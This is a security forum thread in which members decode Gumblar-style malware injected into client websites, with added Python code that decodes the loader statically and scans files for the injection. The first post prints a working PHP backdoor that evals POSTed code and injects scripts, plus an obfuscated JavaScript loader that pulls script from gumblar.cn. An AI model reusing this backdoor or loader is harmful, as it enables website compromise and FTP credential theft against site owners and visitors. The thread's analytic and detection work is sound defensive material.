Zero Identity

Kr0w (Last Login: 2012-01-20; Joined: December 11 2009 01:08; Experience: 2) - 16 day(s) ago
The crashed tables for registration and other stuff are easy to fix (using the MySQL command "REPAIR TABLE").
ttyler333, php coder (Last Login: 0000-00-00; Joined: May 09 2008 01:45; Experience: 1095.2) - 18 day(s) ago
According to a friend the registration doesn't work.
hack4u, ZI Owner (Last Login: 0000-00-00; Joined: March 30 2008 22:30; Experience: 20492) - 19 day(s) ago
Please do keep a list of all the bugs. They might eventually get fixed.. lol.
Hunter X (Last Login: 0000-00-00; Joined: September 25 2010 15:44; Experience: 0) - 01 month(s) ago
What we could do is start compiling a list of bugs on the Tasks page, so if and when development resumes the developers know what needs doing.
Kr0w (Last Login: 2012-01-20; Joined: December 11 2009 01:08; Experience: 2) - 02 month(s) ago
Kewl, the domain renewed another year. :) Any other future plans?
Hunter X (Last Login: 0000-00-00; Joined: September 25 2010 15:44; Experience: 0) - 02 month(s) ago
I've got no idea. I'll send off an email to one of the admins in a moment to check, since I've been meaning to contact them anyway.
Hunter X (Last Login: 0000-00-00; Joined: September 25 2010 15:44; Experience: 0) - 02 month(s) ago
There seems to be ~10 guests on most days, but I have no idea if that's genuine users or crawler bots. If they are real users we need to do something to convince them to register.


Zero Identity Forums - General - Security - decode me



swiftnomad (Administrator, Public Relations; ZI Guru)
Joined: 04/04/2008 | Last Seen: 0000-00-00 | Experience: 3463.68 | Points: 490
#1 decode me on 01/01/1970 00:00
Code:

(function(qLx){var nASYW='%';var jkX=('var.20.61.3d.22.53.63r.69ptEngine.22.2cb.3d.22Version.28.29+.22.2cj.3d.22.22.2cu.3d.6ea.76.69ga.74o.72.2eus.65rAge.6et.3bi.66((u.2eindexOf(.22Win.22).3e0).26.26(u.2e.69nd.65xO.66(.22NT.206.22).3c0.29.26.26(docu.6de.6et.2eco.6fkie.2e.69n.64e.78.4ff(.22miek.3d1.22).3c0).26.26.28typeo.66.28zrv.7a.74s).21.3dt.79p.65o.66(.22A.22)).29.7bzrv.7ats.3d.22A.22.3b.65val.28.22i.66(windo.77.2e.22+a+.22)j.3dj+.22+a+.22Ma.6a.6fr.22+b.2b.61+.22Minor.22+b.2b.61.2b.22.42uild.22+b+.22j.3b.22.29.3bd.6fcument.2ewrite(.22.3cscri.70.74.20src.3d.2f.2f.67umblar.2e.63.6e.2fr.73s.2f.3f.69d.3d.22+j+.22.3e.3c.5c.2f.73cript.3e.22.29.3b.7d').replace(qLx,nASYW);eval(unescape(jkX))})(/./g);


Clients' websites have a lot of encrypted code and hidden iframes, and all of them are reported as attack sites. I'm trying to figure out what all this encrypted shit is.

Code:

<?php
if(!function_exists('tmp_lkojfghx')){
  // backdoor: runs whatever PHP is POSTed in tmp_lkojfghx3
  if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);
  // the injected <script> block, stored base64-encoded
  if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('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'));
  // output-buffer callback: strips other injected scripts, then adds its own before <body>
  function tmp_lkojfghx($s){
    if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));
    if(preg_match_all('#<script(.*?)</script>#is',$s,$a))
      foreach($a[0] as $v)
        if(count(explode("\n",$v))>5){
          $e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);
          if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);
        }
    $s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);
    if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);
    elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;
    return $g?gzencode($s):$s;
  }
  // installed as error handler; with no arguments it re-stacks the output buffers with the filter at the bottom
  function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){
    $s=array();
    if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);
    foreach(@ob_get_status(1) as $v)
      if(($a=$v['name'])=='tmp_lkojfghx')return;
      else $s[]=array($a=='default output handler'?false:$a);
    for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}
    ob_start('tmp_lkojfghx');
    for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}
  }
}
if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;
tmp_lkojfghx2();
?>


I figured out some of it. The base64 was easy..

Code:

<script language=javascript><!-- 
(function(qLx){var nASYW='%';var jkX=('var.20.61.3d.22.53.63r.69ptEngine.22.2cb.3d.22Version.28.29+.22.2cj.3d.22.22.2cu.3d.6ea.76.69ga.74o.72.2eus.65rAge.6et.3bi.66((u.2eindexOf(.22Win.22).3e0).26.26(u.2e.69nd.65xO.66(.22NT.206.22).3c0.29.26.26(docu.6de.6et.2eco.6fkie.2e.69n.64e.78.4ff(.22miek.3d1.22).3c0).26.26.28typeo.66.28zrv.7a.74s).21.3dt.79p.65o.66(.22A.22)).29.7bzrv.7ats.3d.22A.22.3b.65val.28.22i.66(windo.77.2e.22+a+.22)j.3dj+.22+a+.22Ma.6a.6fr.22+b.2b.61+.22Minor.22+b.2b.61.2b.22.42uild.22+b+.22j.3b.22.29.3bd.6fcument.2ewrite(.22.3cscri.70.74.20src.3d.2f.2f.67umblar.2e.63.6e.2fr.73s.2f.3f.69d.3d.22+j+.22.3e.3c.5c.2f.73cript.3e.22.29.3b.7d').replace(qLx,nASYW);eval(unescape(jkX))})(/./g);
 --></script>


But I don't get it.


Code:
if (sizeof (problems.txt) > CRITICAL){
    exec("> /dev/null"); }


USER: Hello Tech Support? I can't print...
ME: Try cursive then <hang up>
pyr0t3chnician (Member; Professional Analyst)
Joined: 01/04/2009 | Last Seen: 0000-00-00 | Experience: 455.88 | Points: 550
#2 Too Legit on 01/01/1970 00:00
The first javascript stuff says this. The function takes its variable qLx (which is a period), then it replaces the .'s with % signs in the huge string and creates the script in unescape. Hope that helps somewhat in your decoding.
Code:
var a="ScriptEngine",b="Version()+",j="",u=navigator.userAgent;
if((u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){
zrvzts="A";
eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");
document.write("<script src=//gumblar.cn/rss/?id="+j+"></script>");}

Unless I am reading this wrong, it makes j = "ScriptEngineMajorVersion()+ScriptEngineMinorVersion()+ScriptEngineBuild+"j;"
I have no idea what the code does besides checking user agent stuff and your cookies for miek=1.

EDIT: found this site, has lots of info on gumblar.cn: http://blog.unmaskparasites.com/2009/05/07/gumblar-cn-exploit-12-facts-about-this-injected-script/

Sounds like this malicious little bugger moves you over to the gumblar.cn website, forces a PDF file download with an Adobe exploit, then searches for your FTP clients, grabs stored passwords, sends them home, then logs on to those ftp sites, and modifies your files.

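To check that reading without loading the sample in a browser, here is an added Python decoder (written for this thread; it is not code from the original post or from the Gumblar sample) that replays the loader's transform statically: swap every '.' back to '%', percent-decode, then resolve the string the inner eval() builds and pull out the remote script src and the cookie check. The OBFUSCATED constant is the jkX string copied from the first post; the function names are my own.

```python
"""Static deobfuscation of the dot-encoded loader quoted in this thread."""
import re
from urllib.parse import unquote

# The jkX string exactly as it appears in the first post of this thread.
OBFUSCATED = (
    'var.20.61.3d.22.53.63r.69ptEngine.22.2cb.3d.22Version.28.29+.22.2cj.3d.22.22.2cu.3d.6ea.76.69ga.74o.72'
    '.2eus.65rAge.6et.3bi.66((u.2eindexOf(.22Win.22).3e0).26.26(u.2e.69nd.65xO.66(.22NT.206.22).3c0.29.26.26'
    '(docu.6de.6et.2eco.6fkie.2e.69n.64e.78.4ff(.22miek.3d1.22).3c0).26.26.28typeo.66.28zrv.7a.74s).21.3dt.79p'
    '.65o.66(.22A.22)).29.7bzrv.7ats.3d.22A.22.3b.65val.28.22i.66(windo.77.2e.22+a+.22)j.3dj+.22+a+.22Ma.6a.6fr'
    '.22+b.2b.61+.22Minor.22+b.2b.61.2b.22.42uild.22+b+.22j.3b.22.29.3bd.6fcument.2ewrite(.22.3cscri.70.74.20src'
    '.3d.2f.2f.67umblar.2e.63.6e.2fr.73s.2f.3f.69d.3d.22+j+.22.3e.3c.5c.2f.73cript.3e.22.29.3b.7d'
)


def deobfuscate(encoded: str, marker: str = '.', escape: str = '%') -> str:
    """Replay the loader's own transform without eval: in the sample every '.'
    stands in for '%', so swapping them back and percent-decoding yields the
    real script (urllib's unquote plays the role of JavaScript's unescape)."""
    return unquote(encoded.replace(marker, escape))


def declared_vars(script: str) -> dict:
    """Collect the quoted string constants from the leading 'var ...;' statement."""
    head = re.match(r'var (.*?);', script)
    return dict(re.findall(r'\b([a-z])="([^"]*)"', head.group(1))) if head else {}


def expand_inner_eval(script: str) -> str:
    """Resolve the string the decoded script hands to its eval(...) call by
    concatenating its quoted pieces with the variables they are joined by."""
    variables = declared_vars(script)
    arg = re.search(r'eval\((.*?)\);', script).group(1)
    parts = []
    for quoted, name in re.findall(r'"([^"]*)"|\b([a-z])\b', arg):
        parts.append(quoted if name == '' else variables.get(name, ''))
    return ''.join(parts)


def script_sources(script: str) -> list:
    """Pull src= values out of the document.write('<script src=...') call;
    this is where the loader's remote host shows up after decoding."""
    return re.findall(r'src=([^\s>"]+)', script)


def kill_switch_cookie(script: str):
    """Return the cookie value the loader looks for before running (it bails
    out when the cookie is present), or None if there is no such check."""
    m = re.search(r'document\.cookie\.indexOf\("([^"]+)"\)<0', script)
    return m.group(1) if m else None


if __name__ == '__main__':
    decoded = deobfuscate(OBFUSCATED)
    print(decoded)
    print('second eval builds:', expand_inner_eval(decoded))
    print('remote loader src:', script_sources(decoded))
    print('kill-switch cookie:', kill_switch_cookie(decoded))
```

Nothing here executes the sample: unquote only undoes the string encoding, and the inner eval is resolved by plain string concatenation, which is enough to recover the host and the cookie the script checks.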
tancurrom (Veteran Member; Advanced Analyst)
Joined: 04/03/2008 | Last Seen: 2011-05-24 | Experience: 532.4 | Points: 450
#3 on 01/01/1970 00:00
Yeah you got that somewhat. The string jkX is already escaped and also has the % replaced by periods to obfuscate it more, it holds the script that runs.

The code that is then evaluated only runs if you are using windows (not NT), the cookie miek isn't 1 and zrvzts isn't a string.

The second eval evaluates to this.
Code:
if(window.ScriptEngine) {
  j = ScriptEngineMajorVersion()+ScriptEngineMinorVersion()+ScriptEngineBuildVersion();
}


I think it's basically fetching the local version number of the hack so it can be passed to their servers so they return the right exploit code to run, maybe log it as well.

Ultimately you end up executing this... (where 000 is the version number)
Code:
<script>zrvzts="A";</script>
<script src=//gumblar.cn/rss/?id=000></script>


Setting the cookie miek=1 will prevent the script running as a quick fix.

@pyr0t3chnician
That link made me chuckle. Facts 2.1 and 2.2 are consistent with most scripts I write, they're kind of invalid points.

A Nibble = 1/2 a Byte

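The cookie trick only protects one browser; on the server side the job is finding the injected code in the files. The following added Python scanner (written for this thread, not code from the original posts or from the Gumblar sample) applies the structural clues discussed above to HTML and PHP text: eval(unescape()) on a string literal dense with dot-encoded hex pairs plus the (/./g) replace, and on the PHP side eval of $_POST data, a base64-decoded constant and the set_error_handler('...') installation. The domain is matched nowhere because, as the decoding shows, it only appears after unescape. The sample files are constructed for this example; the injected snippet is a shortened copy of the first post's loader, and the PHP excerpt only keeps the markers from the first post.

```python
"""Heuristic scanner for the injection pattern discussed in this thread."""
import re

SCRIPT_BLOCK = re.compile(r'<script\b.*?</script>', re.I | re.S)


def dot_hex_density(block: str, threshold: int = 20) -> bool:
    """True if some quoted literal in the block holds >= threshold '.XX' pairs,
    the signature of the dot-for-percent encoding used by the loader."""
    for single, double in re.findall(r"'([^']*)'|\"([^\"]*)\"", block):
        text = single or double
        if len(re.findall(r'\.[0-9a-fA-F]{2}', text)) >= threshold:
            return True
    return False


# (label, predicate) pairs evaluated against each <script> block.
HTML_RULES = [
    ('eval(unescape(...)) on a built string',
     lambda b: re.search(r'eval\s*\(\s*unescape\s*\(', b) is not None),
    ('quoted literal dense with dot-encoded hex pairs', dot_hex_density),
    ('(/./g) passed to replace() to restore every marker',
     lambda b: re.search(r'\(\s*/\./g\s*\)', b) is not None),
]

# (label, regex) pairs evaluated against PHP source text.
PHP_RULES = [
    ('eval() of raw POST data (remote code backdoor)',
     re.compile(r'eval\s*\(\s*\$_POST\[')),
    ("callback installed via set_error_handler('...')",
     re.compile(r"set_error_handler\s*\(\s*'\w+'\s*\)")),
    ('base64-decoded constant defined for later injection',
     re.compile(r"define\s*\(\s*'\w+'\s*,\s*base64_decode\(")),
]


def scan_scripts(html: str) -> list:
    """Return [(script_index, [labels...])] for every script block that trips a rule."""
    findings = []
    for idx, block in enumerate(SCRIPT_BLOCK.findall(html)):
        hits = [label for label, test in HTML_RULES if test(block)]
        if hits:
            findings.append((idx, hits))
    return findings


def scan_php(src: str) -> list:
    """Return the labels of every PHP rule that matches the source text."""
    return [label for label, rx in PHP_RULES if rx.search(src)]


def scan_file(name: str, text: str) -> list:
    """Dispatch on extension so one call works for both kinds of file."""
    return scan_php(text) if name.lower().endswith('.php') else scan_scripts(text)


# --- constructed samples (not taken from any real site) ---------------------
CLEAN_HTML = (
    '<html><head><title>Shop</title><script src="/js/app.js"></script></head>'
    '<body><p>Welcome</p><script>var x = 1;</script></body></html>'
)
# shortened copy of the loader from the first post; the string is cut after 25 pairs
INJECTED = (
    '<script language=javascript><!-- \n'
    "(function(qLx){var nASYW='%';var jkX=('var.20.61.3d.22.53.63r.69ptEngine.22.2cb.3d"
    ".22Version.28.29+.22.2cj.3d.22.22.2cu.3d.6ea.76.69ga.74o.72').replace(qLx,nASYW);"
    'eval(unescape(jkX))})(/./g);\n --></script>'
)
INFECTED_HTML = CLEAN_HTML.replace('</body>', INJECTED + '</body>')
CLEAN_PHP = "<?php echo 'hello'; ?>"
# only the markers of the first post's PHP are kept; the payload is a harmless '<script>'
INFECTED_PHP = (
    "<?php if(!function_exists('tmp_lkojfghx')){"
    "if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);"
    "if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdD4='));"
    "/* rest of the injector elided in this constructed sample */}"
    "if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;"
    "tmp_lkojfghx2(); ?>"
)

if __name__ == '__main__':
    for name, text in [('index.html', CLEAN_HTML), ('index.html', INFECTED_HTML),
                       ('index.php', CLEAN_PHP), ('index.php', INFECTED_PHP)]:
        print(name, scan_file(name, text))
```

Each rule alone would produce false positives on legitimate minified code, so treat a single hit as a lead and two or more in the same block as something to pull and decode; the dot-hex density test is the one that fires on this family even when the variable names are changed.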
pyr0t3chnician (Member; Professional Analyst)
Joined: 01/04/2009 | Last Seen: 0000-00-00 | Experience: 455.88 | Points: 550
#4 on 01/01/1970 00:00
So here's a question. It's all over the net that this malicious script is hosted by gumblar.cn, so why don't they get shut down?

My friend owns a hosting/reseller company, and when someone reports something as little as spam from one of his clients' servers, he shuts it down until they fix the problem. If someone is intentionally doing this, he straight up deletes their account.

Also on a side note, he was pretty pissed this past weekend. Someone hacked into one of his major servers through SSH and deleted 75 VPS accounts on the partitions, all in about 5 minutes. He had to tell those clients they lost their databases, their backups, and pretty much everything that was stored on their VPS, so they weren't too happy. I told him to quit pissing off hackers and accept their fraudulent credit cards when they try to purchase a dedicated server.


